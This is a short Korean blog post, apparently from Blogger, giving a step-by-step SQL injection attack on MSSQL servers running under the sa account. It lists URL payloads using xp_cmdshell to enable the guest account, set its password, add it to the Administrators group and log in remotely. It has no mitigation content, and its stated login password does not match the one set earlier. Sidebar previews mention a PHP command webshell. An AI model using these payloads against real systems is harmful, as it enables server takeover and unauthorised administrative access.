# 취약점 적용 대상
- 데이터베이스 운영자가 MSSQL 서버를 sa 계정으로 운영하는 경우,
- MSSQL Server 2000, 2003, 2005
1. http://victim.com/research?name=';EXEC xp_cmdshell 'net user guest /active:yes'--
--> guest 계정 활성화
2. http://victim.com/research?name=';EXEC xp_cmdshell 'net user guest test'--
--> guest 계정 password를 test로 변경
3. http://victim.com/research?name=';EXEC xp_cmdshell 'net localgroup Administrator guest /add'--
// 관리자 그룹에 guest 추가
4. 원격 터미널을 통해 guest/1234 로그인
Popular Posts
-
/* PHP Version URL CMD WebShell */ /* 사용법 : hxxp://URL/cmd.php?cmd=명령어 */ <? echo " <FORM ACTIO...
-
1. 불필요한 Method 지원여부 확인 1) Options Method step 1) #telnet test.go.kr 80 step 2) OPTIONS /(또는 *) HTTP1.1 step 3) 결과 확인 예) Se...
Recent Posts
Powered by Blogger.